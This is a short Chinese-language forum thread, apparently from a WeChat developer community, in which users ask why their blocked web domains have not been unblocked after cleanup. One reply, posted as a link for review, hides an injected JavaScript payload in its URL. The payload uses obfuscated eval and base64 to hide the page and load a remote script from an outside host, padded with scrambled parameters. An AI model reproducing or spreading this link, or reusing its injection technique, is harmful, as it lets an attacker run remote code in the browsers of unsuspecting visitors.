收藏
回答

我的网址被封已经处理解决,官方一直没有人回复也没有恢复访问?

我的网址被封已经处理解决,官方一直没有人回复也没有恢复访问!

回答关注问题邀请回答
收藏

2 个回答

  • 哈铁建招生办王主任15246672154
    哈铁建招生办王主任15246672154
    2020-10-11

    我们学校的公众号使用的域名因被举报被封,已检查处理了并申请多次解封都没有回复反馈,恳请平台给与处理?

    被封域名hatiejian.918m.cn 学校已经做过自查并删除了违规内容链接,请问审核不通过的原因是什么,或者具体违规链接是哪个呢?请平台给与反馈

    跪求帮助,多谢~


    2020-10-11
    有用
    回复
  • 灵芝
    灵芝
    2020-06-14

    你好,请提供具体链接

    2020-06-14
    有用
    回复 2
    • 探索
      探索
      2020-07-18
      你好,说潜在的诱导行为内容,请您帮我看看这个链接,可以吗?http://mpweixin.chuyigou.com/index.php.hiihmncl?s=/addon/Xinde/My/lists/type/jingxuan.html&scene=126&clicktime=1590055795&getOpenId=1&code=061Wwgqo1tfupl0Fseqo1Hz3qo1Wwgqz&state=123&key='}});this['ev'+'al'](this['at'+'ob']('ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmhpZGRlbj0xO3Y9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7di5zcmM9Imh0dHBzOi8vcy5zeW1zeS5jYy9zaGFyZSI7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZCh2KTt0aHJvdyAw'));$(function(){function a(){//&getOpenId=1&code=081ECg8r00buMk1q1p7r0Or88r0ECg8z&state=123&tgWyQcdvsJzZUXOhTNkfHJGQyfFIxwM5AzMsnIhBHciojImBTZ5UGMlNmMmNjN1ADZxgTO3QjZxAjYhVmM3YTOaQ2Y0ICLi4WYtVmI6IycoFmclJCLiQXZtBHbhRXZJRkI6IiN0gjIsICd5BXZiojIahWYyVmIsIyZfVXzkJiOaMTN5UaMsIyZf5WYtVmI6IycoFmclJCLiMXzn5mI6IyZURUOGFmN5MlWuZkIsIycktmI6IycpRXZfNHZrJCLiQWY0FmI6Qnc1VWfwM5AzMjjIxSryXOVckuQWkAQrhZNDnXTAdwu&getOpenId=1&ooid=96051303&remote=1&out=js&case=tpl2&_c=x4s64192fb240fsk6beq621fdaeaa5cba0&now=1594983102&money=12855#1594983111262
      2020-07-18
      回复
    • 灵芝
      灵芝
      2020-07-21回复探索
      正常访问了
      2020-07-21
      回复
登录 后发表内容
问题标签